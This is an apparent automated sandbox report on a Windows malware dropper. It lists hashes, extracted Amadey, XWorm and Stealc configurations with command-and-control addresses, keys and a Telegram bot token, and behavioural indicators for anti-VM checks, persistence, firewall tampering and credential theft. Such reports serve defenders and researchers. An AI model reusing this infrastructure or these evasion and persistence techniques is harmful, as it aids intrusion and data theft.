Analysis
max time kernel: 97s
max time network: 121s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-04-2024 05:41
Static task
static1
Behavioral task
behavioral1
Sample
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Resource
win10v2004-20240426-en
Errors
General
Target: fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Size: 1.8MB
MD5: 8ee151e8a6df267efc06d71ed339030e
SHA1: 1a0bef02ecc1a20552d9b8bd3490ae73f3c40f8c
SHA256: fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086
SHA512: b31e95334ee5bc0a1269d4b264ad5717cee5b45869c9b5221a3133e761cc77f480c5d89fcf1cdfcdb3858e4840c6152252f80982cce93c0a494a3dbba578799a
SSDEEP: 49152:t3/bnk7qkWHtJgToSSn9HNaH2w27UUWGeN:tjnk7q20dfaH3XUW
Malware Config

Extracted
amadey
4.20
http://193.233.132.139
install_dir: 5454e6f062
install_file: explorta.exe
strings_key: c7a869c5ba1d72480093ec207994e2bf
url_paths: /sev56rkm/index.php

Extracted
amadey
4.17
http://193.233.132.167
install_dir: 4d0ab15804
install_file: chrosha.exe
strings_key: 1a9519d7b465e1f4880fa09a6162d768
url_paths: /enigma/index.php

Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
Install_directory: %AppData%
install_file: explorer.exe
telegram: https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Extracted
stealc
http://185.172.128.62
url_path: /902e53a07830e030.php
Signatures

Detect Xworm Payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe | family_xworm
behavioral1/memory/1876-215-0x00000000004F0000-0x0000000000502000-memory.dmp | family_xworm
Detect ZGRat V1 3 IoCs
Processes:
resource | yara_rule
behavioral1/memory/4776-956-0x000001F5331E0000-0x000001F536AD8000-memory.dmp | family_zgrat_v1
behavioral1/memory/4776-971-0x000001F551490000-0x000001F5515A0000-memory.dmp | family_zgrat_v1
behavioral1/memory/4776-975-0x000001F5387F0000-0x000001F538814000-memory.dmp | family_zgrat_v1
Glupteba payload 7 IoCs
Processes:
resource | yara_rule
behavioral1/memory/5156-508-0x0000000000400000-0x0000000001DFB000-memory.dmp | family_glupteba
behavioral1/memory/5336-507-0x0000000000400000-0x0000000001DFB000-memory.dmp | family_glupteba
behavioral1/memory/5232-827-0x0000000000400000-0x0000000001DFB000-memory.dmp | family_glupteba
behavioral1/memory/5724-828-0x0000000000400000-0x0000000001DFB000-memory.dmp | family_glupteba
behavioral1/memory/5724-1012-0x0000000000400000-0x0000000001DFB000-memory.dmp | family_glupteba
behavioral1/memory/5232-1022-0x0000000000400000-0x0000000001DFB000-memory.dmp | family_glupteba
behavioral1/memory/5232-1052-0x0000000000400000-0x0000000001DFB000-memory.dmp | family_glupteba
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorta.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | amert.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorta.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | chrosha.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 06feb1f97d.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorta.exe
Blocklisted process makes network request 4 IoCs
Processes:
flow | pid | process
122 | 6608 | rundll32.exe
122 | 6608 | rundll32.exe
128 | 4308 | rundll32.exe
272 | 5832 | msiexec.exe
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid | process
5856 | netsh.exe
5680 | netsh.exe
Checks BIOS information in registry 2 TTPs 19 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | amert.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | chrosha.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | chrosha.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 06feb1f97d.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | amert.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 06feb1f97d.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorta.exe
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | d89781e451.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | regasm.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | Install.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | u2r0.3.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | explorta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | chrosha.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | ZleUyzy9WRVICP6WvVkSUjzN.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | mstc.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | gfswPFz.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | Install.exe
Drops startup file 11 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hIvg2m8fSDZL5CKRu5bt1PrM.bat | regasm.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H5AmP1Bu7euIHnF7Jbl0xe4d.bat | regasm.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | mstc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZBRRIw8oikTFvWTHzOY94AGt.bat | regasm.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pShpQdOmB2evffXqvFuid8K0.bat | regasm.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | mstc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tJayfONwY28Tne51PCkK51QK.bat | regasm.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36dIQIRrxCB4HjYro06cKeQn.bat | regasm.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AzRodTEYvdXhkOxY3FgKYeUc.bat | regasm.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JKYD3CHzvR2AY0TzJynO9EhB.bat | regasm.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKhj8AJLHy3DYPwUJu4uwYEg.bat | regasm.exe
Executes dropped EXE 39 IoCs
Processes:
pid | process
5064 | explorta.exe
2264 | amert.exe
4640 | d89781e451.exe
3572 | explorta.exe
4016 | chrosha.exe
3036 | 06feb1f97d.exe
368 | file300un.exe
1876 | mstc.exe
3564 | ZleUyzy9WRVICP6WvVkSUjzN.exe
5156 | uon7YhUxbxygHEmdqaGh1jhy.exe
5336 | 91jwA6wQnD20jEFlNGHkRWzr.exe
5876 | u2r0.0.exe
6024 | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
2528 | run.exe
5232 | 91jwA6wQnD20jEFlNGHkRWzr.exe
5724 | uon7YhUxbxygHEmdqaGh1jhy.exe
5292 | QiAtIglbeauCaEygsP90Kflf.exe
5256 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
5796 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
6208 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
6148 | Install.exe
6272 | u2r0.3.exe
6396 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
6544 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
3148 | Install.exe
4068 | Assistant_109.0.5097.45_Setup.exe_sfx.exe
2500 | assistant_installer.exe
5228 | assistant_installer.exe
5568 | csrss.exe
4508 | injector.exe
4504 | windefender.exe
2764 | windefender.exe
6308 | explorta.exe
6724 | gfswPFz.exe
4320 | explorer.exe
6900 | leykNOBNSzbftkeOiFe2gzF6.exe
3600 | ce-installer_7.14.2_vbox-6.1.20.exe
4684 | pLUaCKBxfWyIAv3qV3OFZGpE.exe
5424 | Install.exe
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | amert.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | explorta.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | chrosha.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | 06feb1f97d.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | explorta.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | explorta.exe
Loads dropped DLL 18 IoCs
Processes:
pid | process
2528 | run.exe
5256 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
5796 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
6208 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
6396 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
6544 | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
6572 | rundll32.exe
6608 | rundll32.exe
4308 | rundll32.exe
5876 | u2r0.0.exe
5876 | u2r0.0.exe
2500 | assistant_installer.exe
2500 | assistant_installer.exe
5228 | assistant_installer.exe
5228 | assistant_installer.exe
1656 | rundll32.exe
6880 | MsiExec.exe
6100 | MsiExec.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource | yara_rule
C:\Users\Admin\Pictures\57jo5fUVeWmkZmhmw7Fi2Zof.exe | themida
behavioral1/memory/6024-295-0x0000000140000000-0x000000014072B000-memory.dmp | themida
behavioral1/memory/6024-826-0x0000000140000000-0x000000014072B000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | mstc.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | uon7YhUxbxygHEmdqaGh1jhy.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | 91jwA6wQnD20jEFlNGHkRWzr.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | leykNOBNSzbftkeOiFe2gzF6.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d89781e451.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\d89781e451.exe" | explorta.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\06feb1f97d.exe = "C:\\Users\\Admin\\1000017002\\06feb1f97d.exe" | explorta.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
Drops Chrome extension 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | gfswPFz.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | gfswPFz.exe
Drops desktop.ini file(s) 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | gfswPFz.exe
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\D: | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\D: | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\F: | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\F: | 2MYMzGM0Ir1ZgoCjigWHeOoy.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
98 | ip-api.com
100 | api.myip.com
104 | ipinfo.io
105 | ipinfo.io
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
Processes:
description | ioc | process
File opened for modification | \??\WinMonFS | csrss.exe
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\1000016001\d89781e451.exe | autoit_exe
Drops file in System32 directory 44 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F | gfswPFz.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | gfswPFz.exe
File opened for modification | C:\Windows\System32\GroupPolicy | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 | gfswPFz.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | gfswPFz.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | gfswPFz.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | gfswPFz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F | gfswPFz.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 | gfswPFz.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
pid | process
2004 | fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
5064 | explorta.exe
2264 | amert.exe
4016 | chrosha.exe
3572 | explorta.exe
3036 | 06feb1f97d.exe
6024 | 57jo5fUVeWmkZmhmw7Fi2Zof.exe
6308 | explorta.exe
Suspicious use of SetThreadContext 3 IoCs
Processes:
description | pid | process | target process
PID 368 set thread context of 5056 | 368 | file300un.exe | regasm.exe
PID 2528 set thread context of 5496 | 2528 | run.exe | cmd.exe
PID 5496 set thread context of 1456 | 5496 | cmd.exe | MSBuild.exe
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
description | ioc | process
File opened (read-only) | \??\VBoxMiniRdrDN | 91jwA6wQnD20jEFlNGHkRWzr.exe
File opened (read-only) | \??\VBoxMiniRdrDN | uon7YhUxbxygHEmdqaGh1jhy.exe
Drops file in Program Files directory 64 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_tr.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxRes.dll | msiexec.exe
File created | C:\Program Files (x86)\epoBtGYzqLvU2\VMyJsluIpBRKc.dll | gfswPFz.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | gfswPFz.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxAutostartSvc.exe | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxDDU.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\x86\VBoxProxyStub-x86.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\x86\VBoxRT-x86.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxSharedFolders.dll | msiexec.exe
File created | C:\Program Files (x86)\zgoZGMcaU\MJlIBK.dll | gfswPFz.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_sl.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxDbg.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxGuestControlSvc.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_bg.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\platforms\qoffscreen.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\Qt5PrintSupportVBox.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_lt.qm | msiexec.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | gfswPFz.exe
